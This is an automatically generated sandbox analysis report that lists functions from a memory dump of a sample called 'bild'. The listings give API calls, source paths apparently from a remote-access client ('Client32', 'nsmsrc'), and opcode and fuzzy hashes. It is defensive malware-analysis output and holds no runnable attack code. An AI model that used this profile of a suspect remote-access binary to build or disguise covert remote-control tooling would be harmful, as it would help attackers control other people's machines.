                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Text$Item$Window$Focus_malloc_memset_strncatwsprintf
                                                                                      • String ID:
                                                                                      • API String ID: 3832070631-0
                                                                                      • Opcode ID: 60fab7655721e0b3046f2d3ba99d2d3761f65fbfa148eacead4071a3fd212dff
                                                                                      • Instruction ID: 7712de199883e751ea03bfa735f50b434bc7bb1cc5edca5bff12a9cf5cd7df4a
                                                                                      • Opcode Fuzzy Hash: 60fab7655721e0b3046f2d3ba99d2d3761f65fbfa148eacead4071a3fd212dff
                                                                                      • Instruction Fuzzy Hash: 0E4192B5A10359ABE710DB74CC45BBAF7F8FB44714F01452AE61AD76C0EAB4A904CB50
                                                                                      Function 11071500 Relevance: 10.7, APIs: 3, Strings: 4, Instructions: 176COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • EnterCriticalSection.KERNEL32(?,4012B9B4,75BF7CB0,75BF7AA0,?,75BF7CB0,75BF7AA0), ref: 11071554
                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 11071568
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      • LeaveCriticalSection.KERNEL32(00000000,?,?), ref: 110716E1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$Leave$EnterErrorExitLastMessageProcesswsprintf
                                                                                      • String ID: ..\ctl32\Connect.cpp$Register NC_CHATEX for conn=%s, q=%p$queue$r->queue != queue
                                                                                      • API String ID: 624642848-3840833929
                                                                                      • Opcode ID: 0c8d2ced26a2bd08ab4c29fa8ca54adca0efbc1028afe9b50eb6db0bcfa7742a
                                                                                      • Instruction ID: f6d3c874c1d1c48a5cbc4b1d223e4c094ec3a892b4c0f1e6412567ed65325da8
                                                                                      • Opcode Fuzzy Hash: 0c8d2ced26a2bd08ab4c29fa8ca54adca0efbc1028afe9b50eb6db0bcfa7742a
                                                                                      • Instruction Fuzzy Hash: F061C775E04285DFD715CF68C480FAABBF6FB08318F0985A9E8968B2C1D774E944CB94
                                                                                      Function 11093180 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 108COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 110CEC60: CreateDialogParamA.USER32(00000000,?,1112D7C9,110CBCD0,00000000), ref: 110CECF1
                                                                                        • Part of subcall function 110CEC60: GetLastError.KERNEL32 ref: 110CEE49
                                                                                        • Part of subcall function 110CEC60: wsprintfA.USER32 ref: 110CEE78
                                                                                        • Part of subcall function 11142DD0: _memset.LIBCMT ref: 11142DF9
                                                                                        • Part of subcall function 11142DD0: GetVersionExA.KERNEL32(?), ref: 11142E12
                                                                                      • GetWindowLongA.USER32(?,000000EC), ref: 110931C9
                                                                                      • SetWindowLongA.USER32(?,000000EC,00000000), ref: 110931F7
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      • GetWindowLongA.USER32(?,000000F0), ref: 11093220
                                                                                      • SetWindowLongA.USER32(?,000000F0,00000000), ref: 1109324E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: LongWindow$ErrorLastwsprintf$CreateDialogExitMessageParamProcessVersion_memset
                                                                                      • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                      • API String ID: 3136964118-2830328467
                                                                                      • Opcode ID: fb6c2165198b052ed1adde41c8e51930884ee91b5ce78e92da16114a67f0499d
                                                                                      • Instruction ID: 17cdb21e99cc57644c55c5a770e75091ec79e40792fa9a2895745f392d232910
                                                                                      • Opcode Fuzzy Hash: fb6c2165198b052ed1adde41c8e51930884ee91b5ce78e92da16114a67f0499d
                                                                                      • Instruction Fuzzy Hash: AF31E475B04609ABC324CFA5DC95FE7B3E5BB88718F10862CF56A976D0DA34B840CB54
                                                                                      Function 11143360 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 94windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • PlaySoundA.WINMM(1000,50,00000000,00020001), ref: 11143451
                                                                                        • Part of subcall function 11163A2D: __isdigit_l.LIBCMT ref: 11163A52
                                                                                      • Beep.KERNEL32(00000000,00000000), ref: 11143415
                                                                                      • MessageBeep.USER32(00000000), ref: 11143427
                                                                                      • MessageBeep.USER32(-00000010), ref: 1114343B
                                                                                      • MessageBeep.USER32(00000000), ref: 1114345D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Beep$Message$PlaySound__isdigit_l
                                                                                      • String ID: 1000,50
                                                                                      • API String ID: 3904670044-1941404556
                                                                                      • Opcode ID: c2824c85be99af7b01869709431b37e6f937a4a8314b06dcce6d67a3277ac74e
                                                                                      • Instruction ID: 938a5c7d7fad482dacf885287002a424905fd2e62ab59dfe834b6d95de8c57fd
                                                                                      • Opcode Fuzzy Hash: c2824c85be99af7b01869709431b37e6f937a4a8314b06dcce6d67a3277ac74e
                                                                                      • Instruction Fuzzy Hash: 93216D66A6C6B272E60105746D847FFFF5E8F81E69F184074E87DC6982EB26E016C321
                                                                                      Function 110612F0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 90COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: wsprintf
                                                                                      • String ID: ..\CTL32\configplus.cpp$result <= buflen
                                                                                      • API String ID: 2111968516-413741496
                                                                                      • Opcode ID: 1e75b457f82be356380a80b6451298dc34942034e65cfc81e57d19b8d6e8b9c2
                                                                                      • Instruction ID: 66cd83cde6406eed73dadf9a29febb3e9e016d9ffe8428f4573ae4edc325b04e
                                                                                      • Opcode Fuzzy Hash: 1e75b457f82be356380a80b6451298dc34942034e65cfc81e57d19b8d6e8b9c2
                                                                                      • Instruction Fuzzy Hash: 8E21DB75E041669BC301CF389C84DEE77ED9FC5369B14C251FDA69B685E631E904C390
                                                                                      Function 110B9000 Relevance: 10.6, APIs: 7, Instructions: 58COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetForegroundWindow.USER32(75BF7AA0,?,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC), ref: 110B9017
                                                                                      • GetCursorPos.USER32(110BFEBC), ref: 110B9026
                                                                                        • Part of subcall function 1115E6F0: GetWindowRect.USER32(?,?), ref: 1115E70C
                                                                                      • PtInRect.USER32(110BFEBC,110BFEBC,110BFEBC), ref: 110B9044
                                                                                      • ClientToScreen.USER32(?,110BFEBC), ref: 110B9066
                                                                                      • SetCursorPos.USER32(110BFEBC,110BFEBC,?,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC), ref: 110B9074
                                                                                      • LoadCursorA.USER32(00000000,00007F00), ref: 110B9081
                                                                                      • SetCursor.USER32(00000000,?,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC), ref: 110B9088
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Cursor$RectWindow$ClientForegroundLoadScreen
                                                                                      • String ID:
                                                                                      • API String ID: 3235510773-0
                                                                                      • Opcode ID: 49be05b7fef80b05594cc908f0611ebf12c6680a206dc75da7e7ca7dce7ec318
                                                                                      • Instruction ID: ad301b5eb86ee9d8d5bbe419ceb9c49b4424cf1b2c79503272c3df1ff599c8d2
                                                                                      • Opcode Fuzzy Hash: 49be05b7fef80b05594cc908f0611ebf12c6680a206dc75da7e7ca7dce7ec318
                                                                                      • Instruction Fuzzy Hash: 8C112EB5E1421A9FCB08DFB4C884DBFF7B8FB84305B108669E52297244DB34E905CBA4
                                                                                      Function 1100B270 Relevance: 10.6, APIs: 7, Instructions: 54COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • InterlockedDecrement.KERNEL32(?), ref: 1100B280
                                                                                      • EnterCriticalSection.KERNEL32(?,?,1100BE6B,?,00000000,00000002), ref: 1100B2B9
                                                                                      • EnterCriticalSection.KERNEL32(?,?,1100BE6B,?,00000000,00000002), ref: 1100B2D8
                                                                                        • Part of subcall function 1100A1D0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?), ref: 1100A1EE
                                                                                        • Part of subcall function 1100A1D0: DeviceIoControl.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?), ref: 1100A218
                                                                                        • Part of subcall function 1100A1D0: GetLastError.KERNEL32 ref: 1100A220
                                                                                        • Part of subcall function 1100A1D0: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 1100A234
                                                                                        • Part of subcall function 1100A1D0: CloseHandle.KERNEL32(00000000), ref: 1100A23B
                                                                                      • waveOutUnprepareHeader.WINMM(00000000,?,00000020,?,1100BE6B,?,00000000,00000002), ref: 1100B2E8
                                                                                      • LeaveCriticalSection.KERNEL32(?,?,1100BE6B,?,00000000,00000002), ref: 1100B2EF
                                                                                      • _free.LIBCMT ref: 1100B2F8
                                                                                      • _free.LIBCMT ref: 1100B2FE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$Enter_free$CloseControlCreateDecrementDeviceErrorEventHandleHeaderInterlockedLastLeaveObjectSingleUnprepareWaitwave
                                                                                      • String ID:
                                                                                      • API String ID: 705253285-0
                                                                                      • Opcode ID: 79ddf153cfec84683290dd42533ea7b8c8eeaab96dddec7867e8baf6a8b692f2
                                                                                      • Instruction ID: 1708c8f2d16fe6171f6400e7ced1c046c931d624ac1b1599b235a4591b72ed62
                                                                                      • Opcode Fuzzy Hash: 79ddf153cfec84683290dd42533ea7b8c8eeaab96dddec7867e8baf6a8b692f2
                                                                                      • Instruction Fuzzy Hash: 06117075904719ABE711CE70CC88BEFB3ECEB48399F000529FA6656144D774B545CB61
                                                                                      Function 1101D0F0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 41registrywindowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _memset.LIBCMT ref: 1101D0FE
                                                                                      • LoadIconA.USER32(00000000,0000139A), ref: 1101D14F
                                                                                      • LoadCursorA.USER32(00000000,00007F00), ref: 1101D15F
                                                                                      • RegisterClassExA.USER32(00000030), ref: 1101D181
                                                                                      • GetLastError.KERNEL32 ref: 1101D187
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Load$ClassCursorErrorIconLastRegister_memset
                                                                                      • String ID: 0
                                                                                      • API String ID: 430917334-4108050209
                                                                                      • Opcode ID: a999cde5bf51422c53d54c5e2b81da0a739011e508cf178ac43a94cfc9df5e13
                                                                                      • Instruction ID: 594e7871e039520b7580a936d726e641a3743c14917196a6b4ce4aa29f199296
                                                                                      • Opcode Fuzzy Hash: a999cde5bf51422c53d54c5e2b81da0a739011e508cf178ac43a94cfc9df5e13
                                                                                      • Instruction Fuzzy Hash: 9C018C74C1431DABEF00EFF0C899BDEFBB8AB04708F104029E521BA284E7BA51048F95
                                                                                      Function 11003310 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 35windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadMenuA.USER32(00000000,00002EFD), ref: 1100331D
                                                                                      • GetSubMenu.USER32(00000000,00000000), ref: 11003343
                                                                                      • DestroyMenu.USER32(00000000), ref: 11003372
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
                                                                                      • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                                      • API String ID: 468487828-934300333
                                                                                      • Opcode ID: e42f28694fc46f4086300125048bfedf8bbbd82d4e050df1718e76ccc8693524
                                                                                      • Instruction ID: e80103f9713123d07a9bceb05cb6f887813353322251b2c4d1aa2998eabbc516
                                                                                      • Opcode Fuzzy Hash: e42f28694fc46f4086300125048bfedf8bbbd82d4e050df1718e76ccc8693524
                                                                                      • Instruction Fuzzy Hash: E5F0A73EF9466933D31666F53D1AF4BAB485B815ACB060031F524EA740EE14B4018166
                                                                                      Function 11147110 Relevance: 9.0, APIs: 6, Instructions: 48threadsynchronizationCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • OpenThread.KERNEL32(0000004A,00000000,11147278,?,?,?,?,?,11147278), ref: 1114713A
                                                                                      • CreateThread.KERNEL32(00000000,00001000,111470B0,?,00000000,?), ref: 1114715E
                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,?,?,11147278), ref: 11147169
                                                                                      • GetExitCodeThread.KERNEL32(00000000,00000000,?,?,?,?,?,?,11147278), ref: 11147174
                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,11147278), ref: 11147181
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,11147278), ref: 11147187
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
